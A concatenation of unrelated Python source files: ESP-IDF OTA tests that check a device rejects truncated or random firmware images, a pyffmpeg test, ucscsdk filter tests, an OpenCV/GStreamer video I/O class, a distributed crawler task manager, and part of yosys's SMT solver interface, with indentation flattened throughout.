"""
Working of OTA if binary file is truncated is validated in this test case.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate truncated binary file
3. Fetch OTA image over HTTPS
4. Check working of code if bin is truncated
"""
dut1 = env.get_dut("native_ota_example", "examples/system/ota/native_ota_example", dut_class=ttfw_idf.ESP32DUT)
# Original binary file generated after compilation
bin_name = "native_ota.bin"
# Truncated binary file to be generated from original binary file
truncated_bin_name = "truncated.bin"
# Size of truncated file to be grnerated. This value can range from 288 bytes (Image header size) to size of original binary file
# truncated_bin_size is set to 64000 to reduce consumed by the test case
truncated_bin_size = 64000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, "r+")
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), "w+")
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("native_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("native_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=60)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8002/" + truncated_bin_name))
dut1.write("https://" + host_ip + ":8002/" + truncated_bin_name)
dut1.expect("native_ota_example: Image validation failed, image is corrupted", timeout=20)
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_native_ota_example_truncated_header(env, extra_data):
"""
Working of OTA if headers of binary file are truncated is vaildated in this test case.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate binary file with truncated headers
3. Fetch OTA image over HTTPS
4. Check working of code if headers are not sent completely
"""
dut1 = env.get_dut("native_ota_example", "examples/system/ota/native_ota_example", dut_class=ttfw_idf.ESP32DUT)
# Original binary file generated after compilation
bin_name = "native_ota.bin"
# Truncated binary file to be generated from original binary file
truncated_bin_name = "truncated_header.bin"
# Size of truncated file to be grnerated. This value should be less than 288 bytes (Image header size)
truncated_bin_size = 180
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, "r+")
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), "w+")
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("native_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("native_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=60)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8002/" + truncated_bin_name))
dut1.write("https://" + host_ip + ":8002/" + truncated_bin_name)
dut1.expect("native_ota_example: received package is not fit len", timeout=20)
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_native_ota_example_random(env, extra_data):
"""
Working of OTA if random data is added in binary file are validated in this test case.
Magic byte verification should fail in this case.
steps: |
1. join AP
2. Generate random binary image
3. Fetch OTA image over HTTPS
4. Check working of code for random binary file
"""
dut1 = env.get_dut("native_ota_example", "examples/system/ota/native_ota_example", dut_class=ttfw_idf.ESP32DUT)
# Random binary file to be generated
random_bin_name = "random.bin"
# Size of random binary file. 32000 is choosen, to reduce the time required to run the test-case
random_bin_size = 32000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, random_bin_name)
fo = open(binary_file, "w+")
# First byte of binary file is always set to zero. If first byte is generated randomly,
# in some cases it may generate 0xE9 which will result in failure of testcase.
fo.write(str(0))
for i in range(random_bin_size - 1):
fo.write(str(random.randrange(0,255,1)))
fo.close()
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("native_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("native_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=60)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8002/" + random_bin_name))
dut1.write("https://" + host_ip + ":8002/" + random_bin_name)
dut1.expect("esp_ota_ops: OTA image has invalid magic byte", timeout=20)
if __name__ == '__main__':
test_examples_protocol_native_ota_example()
test_examples_protocol_native_ota_example_truncated_bin()
test_examples_protocol_native_ota_example_truncated_header()
test_examples_protocol_native_ota_example_random()
|
local_t_est.py
|
import threading
from time import sleep
from pyffmpeg import FFmpeg
ff = FFmpeg()
ff.loglevel = 'info'
def tt():
t_th = threading.Thread(target=ov)
t_th.daemon = True
t_th.start()
qq()
def qq():
sleep(3)
print(ff._ffmpeg_instances)
ff.quit('convert')
def ov():
out = ff.convert('H:\\GitHub\\pyffmpeg\\_test\\quantum.mp4', 'H:\\GitHub\\pyffmpeg\\_test\\fa.mp3')
print('done')
if ff.error:
if 'Output' in ff.error:
assert True
else:
print(ff.error)
else:
assert True
fps = ff.get_fps("H:/CS/practice/python/pyffmpeg subproces/vid.mp4")
print(fps)
# tt()
|
test_generate_filter.py
|
# Copyright 2015 Cisco Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from nose.tools import *
from ucscsdk.ucscfilter import generate_infilter
from ucscsdk.ucscxmlcodec import to_xml_str
success = True
def ls_filter():
global success
filter_ = generate_infilter(class_id="lsServer",
filter_str='(type, "instance", type="eq")',
is_meta_class_id=True)
expected = b'<filter><eq class="lsServer" property="type" ' \
b'value="instance" /></filter>'
if to_xml_str(filter_.to_xml()) != expected:
success = False
def org_filter():
global success
filter_ = generate_infilter(class_id="orgOrg",
filter_str='(descr, "oroorg", type="eq")',
is_meta_class_id=True)
expected = b'<filter><eq class="orgOrg" property="descr" ' \
b'value="oroorg" /></filter>'
if to_xml_str(filter_.to_xml()) != expected:
success = False
def test_001_not_filter():
expected = b'<filter><not><eq class="lsServer" property="dn" ' \
b'value="org-root/ls-C1_B1" /></not></filter>'
filter_str = 'not (dn,"org-root/ls-C1_B1", type="eq")'
filter_xml = generate_infilter(class_id="LsServer",
filter_str=filter_str,
is_meta_class_id=True)
xml_str = to_xml_str(filter_xml.to_xml())
assert_equal(xml_str, expected)
def test_002_multi_thread_filter():
import threading
import time
for i in range(1, 50):
if i % 2 != 0:
target = ls_filter
else:
target = org_filter
thread = threading.Thread(name=i, target=target)
thread.start()
while len(threading.enumerate()) > 1:
time.sleep(1)
assert success
def test_003_mixed_filter():
expected = b'<filter>' \
b'<not>' \
b'<or>' \
b'<eq class="lsServer" property="type" value="instance" />' \
b'<and><eq class="lsServer" property="usrLbl" ' \
b'value="lsserver" />' \
b'<not><wcard class="lsServer" property="descr" ' \
b'value="description" />' \
b'</not>' \
b'</and>' \
b'</or>' \
b'</not>' \
b'</filter>'
filter_str = 'not(' \
'(type, "instance", type="eq") or ' \
'(usr_lbl, "lsserver", type="eq") and ' \
'not(descr, "description", type="re"))'
filter_xml = generate_infilter(class_id="LsServer",
filter_str=filter_str,
is_meta_class_id=True)
xml_str = to_xml_str(filter_xml.to_xml())
assert_equal(xml_str, expected)
|
videoio.py
|
from pathlib import Path
from enum import Enum
from collections import deque
from urllib.parse import urlparse
import subprocess
import threading
import logging
import cv2
LOGGER = logging.getLogger(__name__)
WITH_GSTREAMER = True
class Protocol(Enum):
IMAGE = 0
VIDEO = 1
CSI = 2
V4L2 = 3
RTSP = 4
HTTP = 5
class VideoIO:
"""
Class for capturing from a video file, an image sequence, or a camera, and saving video output.
Encoding, decoding, and scaling can be accelerated using the GStreamer backend.
Parameters
----------
size : (int, int)
Width and height of each frame to output.
config : Dict
Camera and buffer configuration.
input_uri : string
URI to an input video file or capturing device.
output_uri : string
URI to an output video file.
proc_fps : int
Estimated processing speed. This depends on compute and scene complexity.
"""
def __init__(self, size, config, input_uri, output_uri=None, proc_fps=30):
self.size = size
self.input_uri = input_uri
self.output_uri = output_uri
self.proc_fps = proc_fps
self.camera_resolution = config['camera_resolution']
self.frame_rate = config['frame_rate']
self.buffer_size = config['buffer_size']
self.protocol = self._parse_uri(self.input_uri)
self.is_file = self.protocol == Protocol.IMAGE or self.protocol == Protocol.VIDEO
if WITH_GSTREAMER:
self.cap = cv2.VideoCapture(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
else:
self.cap = cv2.VideoCapture(self.input_uri)
self.frame_queue = deque([], maxlen=self.buffer_size)
self.cond = threading.Condition()
self.exit_event = threading.Event()
self.capture_thread = threading.Thread(target=self._capture_frames)
ret, frame = self.cap.read()
if not ret:
raise RuntimeError('Unable to read video stream')
self.frame_queue.append(frame)
width = self.cap.get(cv2.CAP_PROP_FRAME_WIDTH)
height = self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
self.cap_fps = self.cap.get(cv2.CAP_PROP_FPS)
self.do_resize = (width, height) != self.size
if self.cap_fps == 0:
self.cap_fps = self.frame_rate # fallback to config if unknown
LOGGER.info('%dx%d stream @ %d FPS', width, height, self.cap_fps)
if self.output_uri is not None:
Path(self.output_uri).parent.mkdir(parents=True, exist_ok=True)
output_fps = 1 / self.cap_dt
if WITH_GSTREAMER:
self.writer = cv2.VideoWriter(self._gst_write_pipeline(), cv2.CAP_GSTREAMER, 0,
output_fps, self.size, True)
else:
fourcc = cv2.VideoWriter_fourcc(*'avc1')
self.writer = cv2.VideoWriter(self.output_uri, fourcc, output_fps, self.size, True)
@property
def cap_dt(self):
# limit capture interval at processing latency for camera
return 1 / self.cap_fps if self.is_file else 1 / min(self.cap_fps, self.proc_fps)
def start_capture(self):
"""
Start capturing from video file or device.
"""
if not self.cap.isOpened():
self.cap.open(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
if not self.capture_thread.is_alive():
self.capture_thread.start()
def stop_capture(self):
"""
Stop capturing from video file or device.
"""
with self.cond:
self.exit_event.set()
self.cond.notify()
self.frame_queue.clear()
self.capture_thread.join()
def read(self):
"""
Returns the next video frame.
Returns None if there are no more frames.
"""
with self.cond:
while len(self.frame_queue) == 0 and not self.exit_event.is_set():
self.cond.wait()
if len(self.frame_queue) == 0 and self.exit_event.is_set():
return None
frame = self.frame_queue.popleft()
self.cond.notify()
if self.do_resize:
frame = cv2.resize(frame, self.size)
return frame
def write(self, frame):
"""
Writes the next video frame.
"""
assert hasattr(self, 'writer')
self.writer.write(frame)
def release(self):
"""
Closes video file or capturing device.
"""
self.stop_capture()
if hasattr(self, 'writer'):
self.writer.release()
self.cap.release()
def _gst_cap_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'nvvidconv' in gst_elements and self.protocol != Protocol.V4L2:
# format conversion for hardware decoder
cvt_pipeline = (
'nvvidconv interpolation-method=5 ! '
'video/x-raw, width=%d, height=%d, format=BGRx !'
'videoconvert ! appsink sync=false'
% self.size
)
else:
cvt_pipeline = (
'videoscale ! '
'video/x-raw, width=%d, height=%d !'
'videoconvert ! appsink sync=false'
% self.size
)
if self.protocol == Protocol.IMAGE:
pipeline = (
'multifilesrc location=%s index=1 caps="image/%s,framerate=%d/1" ! decodebin ! '
% (
self.input_uri,
self._img_format(self.input_uri),
self.frame_rate
)
)
elif self.protocol == Protocol.VIDEO:
pipeline = 'filesrc location=%s ! decodebin ! ' % self.input_uri
elif self.protocol == Protocol.CSI:
if 'nvarguscamerasrc' in gst_elements:
pipeline = (
'nvarguscamerasrc sensor_id=%s ! '
'video/x-raw(memory:NVMM), width=%d, height=%d, '
'format=NV12, framerate=%d/1 ! '
% (
self.input_uri[6:],
*self.camera_resolution,
self.frame_rate
)
)
else:
raise RuntimeError('GStreamer CSI plugin not found')
elif self.protocol == Protocol.V4L2:
if 'v4l2src' in gst_elements:
pipeline = (
'v4l2src device=%s ! '
'video/x-raw, width=%d, height=%d, '
'format=YUY2, framerate=%d/1 ! '
% (
self.input_uri,
*self.camera_resolution,
self.frame_rate
)
)
else:
raise RuntimeError('GStreamer V4L2 plugin not found')
elif self.protocol == Protocol.RTSP:
pipeline = 'rtspsrc location=%s latency=0 ! decodebin ! ' % self.input_uri
elif self.protocol == Protocol.HTTP:
pipeline = 'souphttpsrc location=%s ! decodebin ! ' % self.input_uri
return pipeline + cvt_pipeline
def _gst_write_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
# use hardware encoder if found
if 'omxh264enc' in gst_elements:
h264_encoder = 'omxh264enc'
elif 'x264enc' in gst_elements:
h264_encoder = 'x264enc'
else:
raise RuntimeError('GStreamer H.264 encoder not found')
pipeline = (
'appsrc ! autovideoconvert ! %s ! qtmux ! filesink location=%s '
% (
h264_encoder,
self.output_uri
)
)
return pipeline
def _capture_frames(self):
while not self.exit_event.is_set():
ret, frame = self.cap.read()
with self.cond:
if not ret:
self.exit_event.set()
self.cond.notify()
break
# keep unprocessed frames in the buffer for file
if self.is_file:
while (len(self.frame_queue) == self.buffer_size and
not self.exit_event.is_set()):
self.cond.wait()
self.frame_queue.append(frame)
self.cond.notify()
@staticmethod
def _parse_uri(uri):
result = urlparse(uri)
if result.scheme == 'csi':
protocol = Protocol.CSI
elif result.scheme == 'rtsp':
protocol = Protocol.RTSP
elif result.scheme == 'http':
protocol = Protocol.HTTP
else:
if '/dev/video' in result.path:
protocol = Protocol.V4L2
elif '%' in result.path:
protocol = Protocol.IMAGE
else:
protocol = Protocol.VIDEO
return protocol
@staticmethod
def _img_format(uri):
suffix = Path(uri).suffix[1:]
return 'jpeg' if suffix == 'jpg' else suffix
|
taskmanager.py
|
# -*- coding:utf-8 -*-
#################分布式爬虫demo,manager###########################
from spider import wpd
import threading
import random, time, Queue,logging
import dill
from multiprocessing.managers import BaseManager
# 定义一个Handler打印INFO及以上级别的日志到sys.stderr
console = logging.StreamHandler()
# 设置日志打印格式
formatter = logging.Formatter('%(asctime)s -[%(threadName)s] - %(levelname)s - %(message)s')
console.setFormatter(formatter)
# 将定义好的console日志handler添加到root logg
logger = logging.getLogger('manager')
logger.setLevel(logging.INFO)
logger.addHandler(console)
# 从BaseManager继承的QueueManager:
class QueueManager(BaseManager):
pass
def make_server_manager():
# 发送任务的队列:
task_queue = Queue.Queue()
# 接收结果的队列:
result_queue = Queue.Queue()
# 把两个Queue都注册到网络上, callable参数关联了Queue对象:
QueueManager.register('get_task_queue', callable=lambda: task_queue)
QueueManager.register('get_result_queue', callable=lambda: result_queue)
# 绑定端口5000, 设置验证码'abc':
manager = QueueManager(address=('127.0.0.1', 5000), authkey='abc')
# 启动Queue:
manager.start()
t1 = threading.Thread(target=startTask, name='TaskQueue',args=(manager,))
t2 = threading.Thread(target=startresultQueue, name='ResultQueue',args=(manager,))
t1.start()
t2.start()
# t1.join()
# t2.join()
def startTask(manager):
# 初始化爬虫
spider1 = wpd.Wpd()
# 获得通过网络访问的Queue对象:
task = manager.get_task_queue()
# 爬取页数:
page =10
n=1
while page>=n:
logger.info(u'读取第 %d页....' % n)
n += 1
imgs = spider1.getPageItems(n)
for v in imgs:
# n = random.randint(0, 10000)
logger.info(u'下载任务放入队列 %s...' % v)
task.put(v)
# 从result队列读取结果:
def startresultQueue(manager):
result = manager.get_result_queue()
logger.info(u'尝试获取下次结果...')
while True:
try:
r = result.get(timeout=10)
logger.info(u'结果: %s' % r)
except Queue.Empty:
logger.warning('task queue is empty.')
# 关闭:
manager.shutdown()
if __name__=='__main__':
make_server_manager()
|
smtio.py
|
#
# yosys -- Yosys Open SYnthesis Suite
#
# Copyright (C) 2012 Clifford Wolf <clifford@clifford.at>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
import sys, re, os, signal
import subprocess
if os.name == "posix":
import resource
from copy import deepcopy
from select import select
from time import time
from queue import Queue, Empty
from threading import Thread
# This is needed so that the recursive SMT2 S-expression parser
# does not run out of stack frames when parsing large expressions
if os.name == "posix":
smtio_reclimit = 64 * 1024
smtio_stacksize = 128 * 1024 * 1024
smtio_stacklimit = resource.RLIM_INFINITY
if os.uname().sysname == "Darwin":
# MacOS has rather conservative stack limits
smtio_stacksize = 16 * 1024 * 1024
smtio_stacklimit = resource.getrlimit(resource.RLIMIT_STACK)[1]
if sys.getrecursionlimit() < smtio_reclimit:
sys.setrecursionlimit(smtio_reclimit)
if resource.getrlimit(resource.RLIMIT_STACK)[0] < smtio_stacksize:
resource.setrlimit(resource.RLIMIT_STACK, (smtio_stacksize, smtio_stacklimit))
# currently running solvers (so we can kill them)
running_solvers = dict()
forced_shutdown = False
solvers_index = 0
def force_shutdown(signum, frame):
global forced_shutdown
if not forced_shutdown:
forced_shutdown = True
if signum is not None:
print("<%s>" % signal.Signals(signum).name)
for p in running_solvers.values():
# os.killpg(os.getpgid(p.pid), signal.SIGTERM)
os.kill(p.pid, signal.SIGTERM)
sys.exit(1)
if os.name == "posix":
signal.signal(signal.SIGHUP, force_shutdown)
signal.signal(signal.SIGINT, force_shutdown)
signal.signal(signal.SIGTERM, force_shutdown)
def except_hook(exctype, value, traceback):
if not forced_shutdown:
sys.__excepthook__(exctype, value, traceback)
force_shutdown(None, None)
sys.excepthook = except_hook
hex_dict = {
"0": "0000", "1": "0001", "2": "0010", "3": "0011",
"4": "0100", "5": "0101", "6": "0110", "7": "0111",
"8": "1000", "9": "1001", "A": "1010", "B": "1011",
"C": "1100", "D": "1101", "E": "1110", "F": "1111",
"a": "1010", "b": "1011", "c": "1100", "d": "1101",
"e": "1110", "f": "1111"
}
class SmtModInfo:
def __init__(self):
self.inputs = set()
self.outputs = set()
self.registers = set()
self.memories = dict()
self.wires = set()
self.wsize = dict()
self.clocks = dict()
self.cells = dict()
self.asserts = dict()
self.covers = dict()
self.anyconsts = dict()
self.anyseqs = dict()
self.allconsts = dict()
self.allseqs = dict()
self.asize = dict()
class SmtIo:
def __init__(self, opts=None):
global solvers_index
self.logic = None
self.logic_qf = True
self.logic_ax = True
self.logic_uf = True
self.logic_bv = True
self.logic_dt = False
self.forall = False
self.produce_models = True
self.smt2cache = [list()]
self.p = None
self.p_index = solvers_index
solvers_index += 1
if opts is not None:
self.logic = opts.logic
self.solver = opts.solver
self.solver_opts = opts.solver_opts
self.debug_print = opts.debug_print
self.debug_file = opts.debug_file
self.dummy_file = opts.dummy_file
self.timeinfo = opts.timeinfo
self.unroll = opts.unroll
self.noincr = opts.noincr
self.info_stmts = opts.info_stmts
self.nocomments = opts.nocomments
else:
self.solver = "yices"
self.solver_opts = list()
self.debug_print = False
self.debug_file = None
self.dummy_file = None
self.timeinfo = os.name != "nt"
self.unroll = False
self.noincr = False
self.info_stmts = list()
self.nocomments = False
self.start_time = time()
self.modinfo = dict()
self.curmod = None
self.topmod = None
self.setup_done = False
def __del__(self):
if self.p is not None and not forced_shutdown:
os.killpg(os.getpgid(self.p.pid), signal.SIGTERM)
if running_solvers is not None:
del running_solvers[self.p_index]
def setup(self):
assert not self.setup_done
if self.forall:
self.unroll = False
if self.solver == "yices":
if self.noincr:
self.popen_vargs = ['yices-smt2'] + self.solver_opts
else:
self.popen_vargs = ['yices-smt2', '--incremental'] + self.solver_opts
if self.solver == "z3":
self.popen_vargs = ['z3', '-smt2', '-in'] + self.solver_opts
if self.solver == "cvc4":
if self.noincr:
self.popen_vargs = ['cvc4', '--lang', 'smt2.6' if self.logic_dt else 'smt2'] + self.solver_opts
else:
self.popen_vargs = ['cvc4', '--incremental', '--lang', 'smt2.6' if self.logic_dt else 'smt2'] + self.solver_opts
if self.solver == "mathsat":
self.popen_vargs = ['mathsat'] + self.solver_opts
if self.solver == "boolector":
if self.noincr:
self.popen_vargs = ['boolector', '--smt2'] + self.solver_opts
else:
self.popen_vargs = ['boolector', '--smt2', '-i'] + self.solver_opts
self.unroll = True
if self.solver == "abc":
if len(self.solver_opts) > 0:
self.popen_vargs = ['yosys-abc', '-S', '; '.join(self.solver_opts)]
else:
self.popen_vargs = ['yosys-abc', '-S', '%blast; &sweep -C 5000; &syn4; &cec -s -m -C 2000']
self.logic_ax = False
self.unroll = True
self.noincr = True
if self.solver == "dummy":
assert self.dummy_file is not None
self.dummy_fd = open(self.dummy_file, "r")
else:
if self.dummy_file is not None:
self.dummy_fd = open(self.dummy_file, "w")
if not self.noincr:
self.p_open()
if self.unroll:
assert not self.forall
self.logic_uf = False
self.unroll_idcnt = 0
self.unroll_buffer = ""
self.unroll_sorts = set()
self.unroll_objs = set()
self.unroll_decls = dict()
self.unroll_cache = dict()
self.unroll_stack = list()
if self.logic is None:
self.logic = ""
if self.logic_qf: self.logic += "QF_"
if self.logic_ax: self.logic += "A"
if self.logic_uf: self.logic += "UF"
if self.logic_bv: self.logic += "BV"
if self.logic_dt: self.logic = "ALL"
self.setup_done = True
for stmt in self.info_stmts:
self.write(stmt)
if self.produce_models:
self.write("(set-option :produce-models true)")
self.write("(set-logic %s)" % self.logic)
def timestamp(self):
secs = int(time() - self.start_time)
return "## %3d:%02d:%02d " % (secs // (60*60), (secs // 60) % 60, secs % 60)
def replace_in_stmt(self, stmt, pat, repl):
if stmt == pat:
return repl
if isinstance(stmt, list):
return [self.replace_in_stmt(s, pat, repl) for s in stmt]
return stmt
def unroll_stmt(self, stmt):
if not isinstance(stmt, list):
return stmt
stmt = [self.unroll_stmt(s) for s in stmt]
if len(stmt) >= 2 and not isinstance(stmt[0], list) and stmt[0] in self.unroll_decls:
assert stmt[1] in self.unroll_objs
key = tuple(stmt)
if key not in self.unroll_cache:
decl = deepcopy(self.unroll_decls[key[0]])
self.unroll_cache[key] = "|UNROLL#%d|" % self.unroll_idcnt
decl[1] = self.unroll_cache[key]
self.unroll_idcnt += 1
if decl[0] == "declare-fun":
if isinstance(decl[3], list) or decl[3] not in self.unroll_sorts:
self.unroll_objs.add(decl[1])
decl[2] = list()
else:
self.unroll_objs.add(decl[1])
decl = list()
elif decl[0] == "define-fun":
arg_index = 1
for arg_name, arg_sort in decl[2]:
decl[4] = self.replace_in_stmt(decl[4], arg_name, key[arg_index])
arg_index += 1
decl[2] = list()
if len(decl) > 0:
decl = self.unroll_stmt(decl)
self.write(self.unparse(decl), unroll=False)
return self.unroll_cache[key]
return stmt
def p_thread_main(self):
while True:
data = self.p.stdout.readline().decode("ascii")
if data == "": break
self.p_queue.put(data)
self.p_queue.put("")
self.p_running = False
def p_open(self):
assert self.p is None
self.p = subprocess.Popen(self.popen_vargs, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
running_solvers[self.p_index] = self.p
self.p_running = True
self.p_next = None
self.p_queue = Queue()
self.p_thread = Thread(target=self.p_thread_main)
self.p_thread.start()
def p_write(self, data, flush):
assert self.p is not None
self.p.stdin.write(bytes(data, "ascii"))
if flush: self.p.stdin.flush()
def p_read(self):
assert self.p is not None
if self.p_next is not None:
data = self.p_next
self.p_next = None
return data
if not self.p_running:
return ""
return self.p_queue.get()
def p_poll(self, timeout=0.1):
assert self.p is not None
assert self.p_running
if self.p_next is not None:
return False
try:
self.p_next = self.p_queue.get(True, timeout)
return False
except Empty:
return True
def p_close(self):
assert self.p is not None
self.p.stdin.close()
self.p_thread.join()
assert not self.p_running
del running_solvers[self.p_index]
self.p = None
self.p_next = None
self.p_queue = None
self.p_thread = None
def write(self, stmt, unroll=True):
if stmt.startswith(";"):
self.info(stmt)
if not self.setup_done:
self.info_stmts.append(stmt)
return
elif not self.setup_done:
self.setup()
stmt = stmt.strip()
if self.nocomments or self.unroll:
stmt = re.sub(r" *;.*", "", stmt)
if stmt == "": return
if unroll and self.unroll:
stmt = self.unroll_buffer + stmt
self.unroll_buffer = ""
s = re.sub(r"\|[^|]*\|", "", stmt)
if s.count("(") != s.count(")"):
self.unroll_buffer = stmt + " "
return
s = self.parse(stmt)
if self.debug_print:
print("-> %s" % s)
if len(s) == 3 and s[0] == "declare-sort" and s[2] == "0":
self.unroll_sorts.add(s[1])
return
elif len(s) == 4 and s[0] == "declare-fun" and s[2] == [] and s[3] in self.unroll_sorts:
self.unroll_objs.add(s[1])
return
elif len(s) >= 4 and s[0] == "declare-fun":
for arg_sort in s[2]:
if arg_sort in self.unroll_sorts:
self.unroll_decls[s[1]] = s
return
elif len(s) >= 4 and s[0] == "define-fun":
for arg_name, arg_sort in s[2]:
if arg_sort in self.unroll_sorts:
self.unroll_decls[s[1]] = s
return
stmt = self.unparse(self.unroll_stmt(s))
if stmt == "(push 1)":
self.unroll_stack.append((
deepcopy(self.unroll_sorts),
deepcopy(self.unroll_objs),
deepcopy(self.unroll_decls),
deepcopy(self.unroll_cache),
))
if stmt == "(pop 1)":
self.unroll_sorts, self.unroll_objs, self.unroll_decls, self.unroll_cache = self.unroll_stack.pop()
if self.debug_print:
print("> %s" % stmt)
if self.debug_file:
print(stmt, file=self.debug_file)
self.debug_file.flush()
if self.solver != "dummy":
if self.noincr:
if self.p is not None and not stmt.startswith("(get-"):
self.p_close()
if stmt == "(push 1)":
self.smt2cache.append(list())
elif stmt == "(pop 1)":
self.smt2cache.pop()
else:
if self.p is not None:
self.p_write(stmt + "\n", True)
self.smt2cache[-1].append(stmt)
else:
self.p_write(stmt + "\n", True)
def info(self, stmt):
if not stmt.startswith("; yosys-smt2-"):
return
fields = stmt.split()
if fields[1] == "yosys-smt2-nomem":
if self.logic is None:
self.logic_ax = False
if fields[1] == "yosys-smt2-nobv":
if self.logic is None:
self.logic_bv = False
if fields[1] == "yosys-smt2-stdt":
if self.logic is None:
self.logic_dt = True
if fields[1] == "yosys-smt2-forall":
if self.logic is None:
self.logic_qf = False
self.forall = True
if fields[1] == "yosys-smt2-module":
self.curmod = fields[2]
self.modinfo[self.curmod] = SmtModInfo()
if fields[1] == "yosys-smt2-cell":
self.modinfo[self.curmod].cells[fields[3]] = fields[2]
if fields[1] == "yosys-smt2-topmod":
self.topmod = fields[2]
if fields[1] == "yosys-smt2-input":
self.modinfo[self.curmod].inputs.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-output":
self.modinfo[self.curmod].outputs.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-register":
self.modinfo[self.curmod].registers.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-memory":
self.modinfo[self.curmod].memories[fields[2]] = (int(fields[3]), int(fields[4]), int(fields[5]), int(fields[6]), fields[7] == "async")
if fields[1] == "yosys-smt2-wire":
self.modinfo[self.curmod].wires.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-clock":
for edge in fields[3:]:
if fields[2] not in self.modinfo[self.curmod].clocks:
self.modinfo[self.curmod].clocks[fields[2]] = edge
elif self.modinfo[self.curmod].clocks[fields[2]] != edge:
self.modinfo[self.curmod].clocks[fields[2]] = "event"
if fields[1] == "yosys-smt2-assert":
self.modinfo[self.curmod].asserts["%s_a %s" % (self.curmod, fields[2])] = fields[3]
if fields[1] == "yosys-smt2-cover":
self.modinfo[self.curmod].covers["%s_c %s" % (self.curmod, fields[2])] = fields[3]
if fields[1] == "yosys-smt2-anyconst":
self.modinfo[self.curmod].anyconsts[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-anyseq":
self.modinfo[self.curmod].anyseqs[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-allconst":
self.modinfo[self.curmod].allconsts[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-allseq":
self.modinfo[self.curmod].allseqs[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
def hiernets(self, top, regs_only=False):
def hiernets_worker(nets, mod, cursor):
